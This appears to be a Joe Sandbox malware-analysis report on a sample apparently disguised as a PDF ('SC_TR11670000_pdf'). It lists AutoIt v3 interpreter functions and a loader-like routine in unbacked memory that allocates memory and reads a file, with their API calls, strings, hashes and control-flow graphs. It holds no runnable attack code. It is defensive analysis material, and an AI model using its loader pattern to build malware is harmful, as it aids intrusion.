                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                          • String ID:
                                                                          • API String ID: 48322524-0
                                                                          • Opcode ID: f33717810903b23ccd47e840271e9ba916cad8a3058e91a0aad01bad859b0e32
                                                                          • Instruction ID: a01893eca31fd70ba8f763629df25bb15301c148dc095277eeaa4f43e180b94d
                                                                          • Opcode Fuzzy Hash: f33717810903b23ccd47e840271e9ba916cad8a3058e91a0aad01bad859b0e32
                                                                          • Instruction Fuzzy Hash: 02E0D8314104015B42106B38FC4D4FA779CDE06335F100796F835C21E0EBF45A60A999
                                                                          Function 00AEE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Variable must be of type 'Object'., xrefs: 00B2428C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Variable must be of type 'Object'.
                                                                          • API String ID: 0-109567571
                                                                          • Opcode ID: 72317db6c8ddcbf61161d76f21f0f0f7fe529209cf0911ffa0c675a62496e784
                                                                          • Instruction ID: 53d50f793f3174bf7b967c3b8426f6e5abb8f532ec508a9969d6d79c94a3bfa4
                                                                          • Opcode Fuzzy Hash: 72317db6c8ddcbf61161d76f21f0f0f7fe529209cf0911ffa0c675a62496e784
                                                                          • Instruction Fuzzy Hash: 75A2A274A04255CFCB24CF5AC980AAEB7F1FF59300F2481A9E91AAB351D735ED42CB91
                                                                          Function 00AF0B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF0BBB
                                                                          • timeGetTime.WINMM ref: 00AF0E76
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF0FB3
                                                                          • TranslateMessage.USER32(?), ref: 00AF0FC7
                                                                          • DispatchMessageW.USER32(?), ref: 00AF0FD5
                                                                          • Sleep.KERNEL32(0000000A), ref: 00AF0FDF
                                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00AF105A
                                                                          • DestroyWindow.USER32 ref: 00AF1066
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00AF1080
                                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00B252AD
                                                                          • TranslateMessage.USER32(?), ref: 00B2608A
                                                                          • DispatchMessageW.USER32(?), ref: 00B26098
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B260AC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                          • API String ID: 4003667617-3242690629
                                                                          • Opcode ID: 2e9df0b02a3dee71f75baea696698afe0845960aaa8b4173533d02abd6648e27
                                                                          • Instruction ID: df7f69e498b230528fa117e4d8e3ae7d2e0e0196f804e5d788768c731ffc4230
                                                                          • Opcode Fuzzy Hash: 2e9df0b02a3dee71f75baea696698afe0845960aaa8b4173533d02abd6648e27
                                                                          • Instruction Fuzzy Hash: CAB2AC70608751DFD738DB24D885BAABBE5FF84304F14499DF58A872A2DB74E844CB82
                                                                          Function 00B493DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00B491E9: __time64.LIBCMT ref: 00B491F3
                                                                            • Part of subcall function 00AE5045: _fseek.LIBCMT ref: 00AE505D
                                                                          • __wsplitpath.LIBCMT ref: 00B494BE
                                                                            • Part of subcall function 00B0432E: __wsplitpath_helper.LIBCMT ref: 00B0436E
                                                                          • _wcscpy.LIBCMT ref: 00B494D1
                                                                          • _wcscat.LIBCMT ref: 00B494E4
                                                                          • __wsplitpath.LIBCMT ref: 00B49509
                                                                          • _wcscat.LIBCMT ref: 00B4951F
                                                                          • _wcscat.LIBCMT ref: 00B49532
                                                                            • Part of subcall function 00B4922F: _memmove.LIBCMT ref: 00B49268
                                                                            • Part of subcall function 00B4922F: _memmove.LIBCMT ref: 00B49277
                                                                          • _wcscmp.LIBCMT ref: 00B49479
                                                                            • Part of subcall function 00B499BE: _wcscmp.LIBCMT ref: 00B49AAE
                                                                            • Part of subcall function 00B499BE: _wcscmp.LIBCMT ref: 00B49AC1
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B496DC
                                                                          • _wcsncpy.LIBCMT ref: 00B4974F
                                                                          • DeleteFileW.KERNEL32(?,?), ref: 00B49785
                                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B4979B
                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B497AC
                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B497BE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                          • String ID:
                                                                          • API String ID: 1500180987-0
                                                                          • Opcode ID: 0d43018240ca2c2f8964e5a9be40d54949300e53fd4a888287f8333de3ca6503
                                                                          • Instruction ID: 62a9b54801b8c6903e1b67dbfc32ca74416fd69295888e6527573d6eb83c3378
                                                                          • Opcode Fuzzy Hash: 0d43018240ca2c2f8964e5a9be40d54949300e53fd4a888287f8333de3ca6503
                                                                          • Instruction Fuzzy Hash: 9CC128B1D00229AEDF21DFA5CD85ADFBBBDEF44304F0040AAF609E6151DB709A849F65
                                                                          Function 00AE3015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00AE3074
                                                                          • RegisterClassExW.USER32(00000030), ref: 00AE309E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE30AF
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00AE30CC
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AE30DC
                                                                          • LoadIconW.USER32(000000A9), ref: 00AE30F2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AE3101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: a407fa877b9cc8cb200a1e0aad7c664c8e77afa0e236e8a9cfd0d7842575fbd2
                                                                          • Instruction ID: cb1639e5e73f78303296d3910f70fc6dc19f1fb34b3d34941bdc2596e04e5183
                                                                          • Opcode Fuzzy Hash: a407fa877b9cc8cb200a1e0aad7c664c8e77afa0e236e8a9cfd0d7842575fbd2
                                                                          • Instruction Fuzzy Hash: 0E3149B184430AAFDB40CFA4EC85AD9BBF4FB09310F14456AE590E72A0DBB94585CF90
                                                                          Function 00AE3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00AE3074
                                                                          • RegisterClassExW.USER32(00000030), ref: 00AE309E
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE30AF
                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00AE30CC
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AE30DC
                                                                          • LoadIconW.USER32(000000A9), ref: 00AE30F2
                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AE3101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: b982f4324f2caab1612db1e7838ced15e89f07631f0bebbb7d6db0afb9a2241d
                                                                          • Instruction ID: 3fbe224ed6a060633ae53ed8ead6c64317253c115442da12921ea22679480b51
                                                                          • Opcode Fuzzy Hash: b982f4324f2caab1612db1e7838ced15e89f07631f0bebbb7d6db0afb9a2241d
                                                                          • Instruction Fuzzy Hash: FC21C5B1D01219AFDB00DFA4EC49BADBBF8FB09700F04412AF510A72A0DBB945448F91
                                                                          Function 00AE71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00AE4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BA62F8,?,00AE37C0,?), ref: 00AE4882
                                                                            • Part of subcall function 00B0074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AE72C5), ref: 00B00771
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AE7308
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B1ECF1
                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B1ED32
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00B1ED70
                                                                          • _wcscat.LIBCMT ref: 00B1EDC9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                          • API String ID: 2673923337-2727554177
                                                                          • Opcode ID: e72e819f94f83b8e0114ba7b4a3fade7d81559912191edf36168850933139f4e
                                                                          • Instruction ID: 1ece123bc27126dc49425729f11dafb193e593ebb6359b7b8d3aa8ec86ea1fc5
                                                                          • Opcode Fuzzy Hash: e72e819f94f83b8e0114ba7b4a3fade7d81559912191edf36168850933139f4e
                                                                          • Instruction Fuzzy Hash: 89714A7254C3419EC314EF66EC86AABBBE8FF9A340F40446EF455871A1EF709948CB51
                                                                          Function 00AE3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00AE3A62
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00AE3A71
                                                                          • LoadIconW.USER32(00000063), ref: 00AE3A88
                                                                          • LoadIconW.USER32(000000A4), ref: 00AE3A9A
                                                                          • LoadIconW.USER32(000000A2), ref: 00AE3AAC
                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AE3AD2
                                                                          • RegisterClassExW.USER32(?), ref: 00AE3B28
                                                                            • Part of subcall function 00AE3041: GetSysColorBrush.USER32(0000000F), ref: 00AE3074
                                                                            • Part of subcall function 00AE3041: RegisterClassExW.USER32(00000030), ref: 00AE309E
                                                                            • Part of subcall function 00AE3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE30AF
                                                                            • Part of subcall function 00AE3041: InitCommonControlsEx.COMCTL32(?), ref: 00AE30CC
                                                                            • Part of subcall function 00AE3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AE30DC
                                                                            • Part of subcall function 00AE3041: LoadIconW.USER32(000000A9), ref: 00AE30F2
                                                                            • Part of subcall function 00AE3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AE3101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: #$0$AutoIt v3
                                                                          • API String ID: 423443420-4155596026
                                                                          • Opcode ID: d03bb6e96dd0b6263990b0b1aa3c3ecb5ddafc3413375c427970c1acaeb269ab
                                                                          • Instruction ID: 45ef3f40d9bef6863bb1bd6355e4d42e79d3f418ab4ca6c217a5074082fb6701
                                                                          • Opcode Fuzzy Hash: d03bb6e96dd0b6263990b0b1aa3c3ecb5ddafc3413375c427970c1acaeb269ab
                                                                          • Instruction Fuzzy Hash: 06215EB1D00305AFEB149FA5EC0ABAD7BB4FB09711F040129F504A72E0DBBA59549F84
                                                                          Function 00AE3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 767 ae3633-ae3681 769 ae3683-ae3686 767->769 770 ae36e1-ae36e3 767->770 772 ae3688-ae368f 769->772 773 ae36e7 769->773 770->769 771 ae36e5 770->771 774 ae36ca-ae36d2 DefWindowProcW 771->774 777 ae375d-ae3765 PostQuitMessage 772->777 778 ae3695-ae369a 772->778 775 ae36ed-ae36f0 773->775 776 b1d31c-b1d34a call af11d0 call af11f3 773->776 779 ae36d8-ae36de 774->779 781 ae3715-ae373c SetTimer RegisterWindowMessageW 775->781 782 ae36f2-ae36f3 775->782 814 b1d34f-b1d356 776->814 780 ae3711-ae3713 777->780 783 b1d38f-b1d3a3 call b42a16 778->783 784 ae36a0-ae36a2 778->784 780->779 781->780 788 ae373e-ae3749 CreatePopupMenu 781->788 786 ae36f9-ae370c KillTimer call ae44cb call ae3114 782->786 787 b1d2bf-b1d2c2 782->787 783->780 809 b1d3a9 783->809 789 ae36a8-ae36ad 784->789 790 ae3767-ae3776 call ae4531 784->790 786->780 794 b1d2c4-b1d2c6 787->794 795 b1d2f8-b1d317 MoveWindow 787->795 788->780 797 b1d374-b1d37b 789->797 798 ae36b3-ae36b8 789->798 790->780 803 b1d2e7-b1d2f3 SetFocus 794->803 804 b1d2c8-b1d2cb 794->804 795->780 797->774 806 b1d381-b1d38a call b3817e 797->806 807 ae36be-ae36c4 798->807 808 ae374b-ae375b call ae45df 798->808 803->780 804->807 810 b1d2d1-b1d2e2 call af11d0 804->810 806->774 807->774 807->814 808->780 809->774 810->780 814->774 815 b1d35c-b1d36f call ae44cb call ae43db 814->815 815->774
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00AE36D2
                                                                          • KillTimer.USER32(?,00000001), ref: 00AE36FC
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AE371F
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AE372A
                                                                          • CreatePopupMenu.USER32 ref: 00AE373E
                                                                          • PostQuitMessage.USER32(00000000), ref: 00AE375F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated
                                                                          • API String ID: 129472671-2362178303
                                                                          • Opcode ID: 5b629f42794f22481a4afe42e524c653024220b83ea38ab7455d3b67028c417f
                                                                          • Instruction ID: cf9344fb3cf363c9be94581576fd880f438f07ce31ae81ae4b7cc24b8e451a18
                                                                          • Opcode Fuzzy Hash: 5b629f42794f22481a4afe42e524c653024220b83ea38ab7455d3b67028c417f
                                                                          • Instruction Fuzzy Hash: 4F412AF3204285BBDF149F75EC0EB7E37A8EB05300F180129F612872E1DEA59E509765
                                                                          Function 00AE3778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                          • API String ID: 1825951767-3513169116
                                                                          • Opcode ID: a2b707991178b0cfb42939618454a3299b454492adacb7eb11bd2b2ea7e2975c
                                                                          • Instruction ID: 5b101cd57a193264afaab47536d287f5ec973032bdbbe4806a2798c24748d7ed
                                                                          • Opcode Fuzzy Hash: a2b707991178b0cfb42939618454a3299b454492adacb7eb11bd2b2ea7e2975c
                                                                          • Instruction Fuzzy Hash: 3BA151B2C102699ACF04EFA6DD95EEEB7B8BF14300F440569F416B7191EF745A09CB60
                                                                          Function 01C525B0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 942 1c525b0-1c5265e call 1c50000 945 1c52665-1c5268b call 1c534c0 CreateFileW 942->945 948 1c52692-1c526a2 945->948 949 1c5268d 945->949 957 1c526a4 948->957 958 1c526a9-1c526c3 VirtualAlloc 948->958 950 1c527dd-1c527e1 949->950 951 1c52823-1c52826 950->951 952 1c527e3-1c527e7 950->952 954 1c52829-1c52830 951->954 955 1c527f3-1c527f7 952->955 956 1c527e9-1c527ec 952->956 959 1c52885-1c5289a 954->959 960 1c52832-1c5283d 954->960 961 1c52807-1c5280b 955->961 962 1c527f9-1c52803 955->962 956->955 957->950 963 1c526c5 958->963 964 1c526ca-1c526e1 ReadFile 958->964 969 1c5289c-1c528a7 VirtualFree 959->969 970 1c528aa-1c528b2 959->970 967 1c52841-1c5284d 960->967 968 1c5283f 960->968 971 1c5280d-1c52817 961->971 972 1c5281b 961->972 962->961 963->950 965 1c526e3 964->965 966 1c526e8-1c52728 VirtualAlloc 964->966 965->950 973 1c5272f-1c5274a call 1c53710 966->973 974 1c5272a 966->974 975 1c52861-1c5286d 967->975 976 1c5284f-1c5285f 967->976 968->959 969->970 971->972 972->951 982 1c52755-1c5275f 973->982 974->950 979 1c5286f-1c52878 975->979 980 1c5287a-1c52880 975->980 978 1c52883 976->978 978->954 979->978 980->978 983 1c52761-1c52790 call 1c53710 982->983 984 1c52792-1c527a6 call 1c53520 982->984 983->982 990 1c527a8 984->990 991 1c527aa-1c527ae 984->991 990->950 992 1c527b0-1c527b4 CloseHandle 991->992 993 1c527ba-1c527be 991->993 992->993 994 1c527c0-1c527cb VirtualFree 993->994 995 1c527ce-1c527d7 993->995 994->995 995->945 995->950
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01C52681
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01C528A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0
                                                                          • Opcode ID: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                          • Instruction ID: 10c264ce49a2ea77150062ab73cf8ac45a96c267d0d58ada124ca1fe9ad5c6b9
                                                                          • Opcode Fuzzy Hash: e7fcc9d0c03c8eebee60ddba528add67e317e316073a556d8272a5bdc8b54fa5
                                                                          • Instruction Fuzzy Hash: 2EA10875E00209EBDB54CFE4C894BEEBBB5FF48304F208559E901BB281D7759A80CB98
                                                                          Function 00AE39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1073 ae39e7-ae3a57 CreateWindowExW * 2 ShowWindow * 2
                                                                          APIs
                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AE3A15
                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AE3A36
                                                                          • ShowWindow.USER32(00000000,?,?), ref: 00AE3A4A
                                                                          • ShowWindow.USER32(00000000,?,?), ref: 00AE3A53
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
